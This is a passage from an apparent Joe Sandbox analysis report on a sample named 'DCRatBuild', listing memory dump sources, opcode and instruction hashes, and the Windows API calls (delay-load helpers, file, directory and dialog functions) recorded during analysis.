                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: f50a180c8a3be34574d3e7ea34c5290f78632db21768c291364bc348d52633c7
                                        • Instruction ID: 315760f5f92eb3e7954dfe2992808b4e3354fa1ea632a926d316600675e4d33c
                                        • Opcode Fuzzy Hash: f50a180c8a3be34574d3e7ea34c5290f78632db21768c291364bc348d52633c7
                                        • Instruction Fuzzy Hash: 2FA002D566D502BC312861516D56D36021DC4C7B517314559B497D44C197486D495871
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074DAB2
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: c34d6b3f556b7fc0ebd2184780af5ef23693cec625932ebd7d22713c3e2f0ba3
                                        • Instruction ID: 63102b2a12235e50ea75b6731a6c13f7059f5688476d3dcaf883e5c7671dffd2
                                        • Opcode Fuzzy Hash: c34d6b3f556b7fc0ebd2184780af5ef23693cec625932ebd7d22713c3e2f0ba3
                                        • Instruction Fuzzy Hash: 15A002D536D102BC712C71516D16D3A025CC4C5B51331851AB457D4545574C5D495471
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074DAB2
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 96a99286a3839f957332000832f9b8dbc1d6d89f067570414f266d6f9a23c1b7
                                        • Instruction ID: 63102b2a12235e50ea75b6731a6c13f7059f5688476d3dcaf883e5c7671dffd2
                                        • Opcode Fuzzy Hash: 96a99286a3839f957332000832f9b8dbc1d6d89f067570414f266d6f9a23c1b7
                                        • Instruction Fuzzy Hash: 15A002D536D102BC712C71516D16D3A025CC4C5B51331851AB457D4545574C5D495471
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074DAB2
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: e5a743c8d377ae79708e34ae952d86a788ac9beef1a57c0f9da7d949fb807c4f
                                        • Instruction ID: 63102b2a12235e50ea75b6731a6c13f7059f5688476d3dcaf883e5c7671dffd2
                                        • Opcode Fuzzy Hash: e5a743c8d377ae79708e34ae952d86a788ac9beef1a57c0f9da7d949fb807c4f
                                        • Instruction Fuzzy Hash: 15A002D536D102BC712C71516D16D3A025CC4C5B51331851AB457D4545574C5D495471
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074DAB2
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 5681777bed350dc4214bffe45b666d943156bd5b5c7b2a0f868e77e3521772b4
                                        • Instruction ID: 63102b2a12235e50ea75b6731a6c13f7059f5688476d3dcaf883e5c7671dffd2
                                        • Opcode Fuzzy Hash: 5681777bed350dc4214bffe45b666d943156bd5b5c7b2a0f868e77e3521772b4
                                        • Instruction Fuzzy Hash: 15A002D536D102BC712C71516D16D3A025CC4C5B51331851AB457D4545574C5D495471
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074DAB2
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: fa60f0790a53c73438319717abb056b03407eda43b5d4c0bbd52b81c117bdee9
                                        • Instruction ID: 63102b2a12235e50ea75b6731a6c13f7059f5688476d3dcaf883e5c7671dffd2
                                        • Opcode Fuzzy Hash: fa60f0790a53c73438319717abb056b03407eda43b5d4c0bbd52b81c117bdee9
                                        • Instruction Fuzzy Hash: 15A002D536D102BC712C71516D16D3A025CC4C5B51331851AB457D4545574C5D495471
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074DAB2
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 00aee3598d27cf971d4663a328ceb7afb5c5c35328deda937adda5426594b05a
                                        • Instruction ID: e94dc9b8788d66c8f1a1418ddd918e112cc288974ff20afac4684b1c1c00d0e9
                                        • Opcode Fuzzy Hash: 00aee3598d27cf971d4663a328ceb7afb5c5c35328deda937adda5426594b05a
                                        • Instruction Fuzzy Hash: 38A002D536D5017C716C7151AD16D3A025CD4D1B11331851AB457D4545574C5D495471
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074DBD5
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: eb9e9283c11351f1825bd3f29be4633d8c96e735e76172b6dbd1c8ac2abb9f51
                                        • Instruction ID: f7a5df70f133768067073bfcb45470cade72c40473283b40d638176300c45934
                                        • Opcode Fuzzy Hash: eb9e9283c11351f1825bd3f29be4633d8c96e735e76172b6dbd1c8ac2abb9f51
                                        • Instruction Fuzzy Hash: ABA012E526C002BC312811102C1BC36021CC0C1F10331440EB447C00419B480C4C5030
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074DC36
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 2340876abb7e65c5660d6c925b56467af8c4bd53992250b19bb1eaac4ab080ce
                                        • Instruction ID: 7ff8c56b74e64291de9f084e7032f7eb89e67787e58773429d790e4b4df59ebe
                                        • Opcode Fuzzy Hash: 2340876abb7e65c5660d6c925b56467af8c4bd53992250b19bb1eaac4ab080ce
                                        • Instruction Fuzzy Hash: 2CA012E556C102FC312C21002C26C36031CC0C5B10330480AB447E004177881C484030
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074DC36
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 8bbd96b35b1a4ae3bc6ccbab36cf343823edae4e976670eafd9d766bf2c056b2
                                        • Instruction ID: 7ff8c56b74e64291de9f084e7032f7eb89e67787e58773429d790e4b4df59ebe
                                        • Opcode Fuzzy Hash: 8bbd96b35b1a4ae3bc6ccbab36cf343823edae4e976670eafd9d766bf2c056b2
                                        • Instruction Fuzzy Hash: 2CA012E556C102FC312C21002C26C36031CC0C5B10330480AB447E004177881C484030
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074DBD5
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 32acfb8a65e416e6302d087b8538ec437a6dc7b1b595760b8f388df083087e33
                                        • Instruction ID: f7a5df70f133768067073bfcb45470cade72c40473283b40d638176300c45934
                                        • Opcode Fuzzy Hash: 32acfb8a65e416e6302d087b8538ec437a6dc7b1b595760b8f388df083087e33
                                        • Instruction Fuzzy Hash: ABA012E526C002BC312811102C1BC36021CC0C1F10331440EB447C00419B480C4C5030
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074DBD5
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 350dd76912d3cdf6d3b5e1bf0554ae4c944e17711cfcc33d8affcf3706bafcac
                                        • Instruction ID: f7a5df70f133768067073bfcb45470cade72c40473283b40d638176300c45934
                                        • Opcode Fuzzy Hash: 350dd76912d3cdf6d3b5e1bf0554ae4c944e17711cfcc33d8affcf3706bafcac
                                        • Instruction Fuzzy Hash: ABA012E526C002BC312811102C1BC36021CC0C1F10331440EB447C00419B480C4C5030
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074DBD5
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: c05520e94043544cbd854c383bf165fd2f0e74ef7dc434fb14ffac1bd9cc8e48
                                        • Instruction ID: f7a5df70f133768067073bfcb45470cade72c40473283b40d638176300c45934
                                        • Opcode Fuzzy Hash: c05520e94043544cbd854c383bf165fd2f0e74ef7dc434fb14ffac1bd9cc8e48
                                        • Instruction Fuzzy Hash: ABA012E526C002BC312811102C1BC36021CC0C1F10331440EB447C00419B480C4C5030
                                        APIs
                                        • SetEndOfFile.KERNELBASE(?,00739104,?,?,-00001964), ref: 00739EC2
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: File
                                        • String ID:
                                        • API String ID: 749574446-0
                                        • Opcode ID: cf71d82be241b829cedeeed7588cc5941853c1f61b0e3440539eaa89dfa07efe
                                        • Instruction ID: 0d57b15278605aca298edca0e290b85986801e6872035b26de7f7ceb658e508f
                                        • Opcode Fuzzy Hash: cf71d82be241b829cedeeed7588cc5941853c1f61b0e3440539eaa89dfa07efe
                                        • Instruction Fuzzy Hash: 42B011300A800A8A8E002B30CE088283A22EA2230A30082A0A003CA0A0CB22C00AAA00
                                        APIs
                                        • SetCurrentDirectoryW.KERNELBASE(?,0074A587,C:\Users\user\Desktop,00000000,0077946A,00000006), ref: 0074A326
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: CurrentDirectory
                                        • String ID:
                                        • API String ID: 1611563598-0
                                        • Opcode ID: 9df4a329bcfa5798f265073aaefe5534a5d1e8d244b8b92e04d9b1f94f38048e
                                        • Instruction ID: 9170b57727309be6cbd60244d6f5483632ea7a36d1dbccaa313297afe87c0d30
                                        • Opcode Fuzzy Hash: 9df4a329bcfa5798f265073aaefe5534a5d1e8d244b8b92e04d9b1f94f38048e
                                        • Instruction Fuzzy Hash: B3A0123019410A578A000B30CC09C1576505761702F00C620B003C00A0CB348814E504
                                        APIs
                                        • CloseHandle.KERNELBASE(000000FF,?,?,0073968F,?,?,?,?,00761FA1,000000FF), ref: 007396EB
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: 2ff32ed1fcbb1c2dc583a2d5c23893a58f72ca947c403318b3ad1727dd524a5f
                                        • Instruction ID: dbe0eda6b252774dbde0ae62214db3373b58709ce98433ba560139d90525ed20
                                        • Opcode Fuzzy Hash: 2ff32ed1fcbb1c2dc583a2d5c23893a58f72ca947c403318b3ad1727dd524a5f
                                        • Instruction Fuzzy Hash: 25F05E30597B04DFFB308A24D949792B7E4AB12725F048B1ED1EB434E1A7A9694D8B40
                                        APIs
                                          • Part of subcall function 0073130B: GetDlgItem.USER32(00000000,00003021), ref: 0073134F
                                          • Part of subcall function 0073130B: SetWindowTextW.USER32(00000000,007635B4), ref: 00731365
                                        • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0074B971
                                        • EndDialog.USER32(?,00000006), ref: 0074B984
                                        • GetDlgItem.USER32(?,0000006C), ref: 0074B9A0
                                        • SetFocus.USER32(00000000), ref: 0074B9A7
                                        • SetDlgItemTextW.USER32(?,00000065,?), ref: 0074B9E1
                                        • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0074BA18
                                        • FindFirstFileW.KERNEL32(?,?), ref: 0074BA2E
                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0074BA4C
                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0074BA5C
                                        • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0074BA78
                                        • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0074BA94
                                        • _swprintf.LIBCMT ref: 0074BAC4
                                          • Part of subcall function 0073400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0073401D
                                        • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0074BAD7
                                        • FindClose.KERNEL32(00000000), ref: 0074BADE
                                        • _swprintf.LIBCMT ref: 0074BB37
                                        • SetDlgItemTextW.USER32(?,00000068,?), ref: 0074BB4A
                                        • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0074BB67
                                        • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0074BB87
                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0074BB97
                                        • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0074BBB1
                                        • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0074BBC9
                                        • _swprintf.LIBCMT ref: 0074BBF5
                                        • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0074BC08
                                        • _swprintf.LIBCMT ref: 0074BC5C
                                        • SetDlgItemTextW.USER32(?,00000069,?), ref: 0074BC6F
                                          • Part of subcall function 0074A63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0074A662
                                          • Part of subcall function 0074A63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,0076E600,?,?), ref: 0074A6B1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                         • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
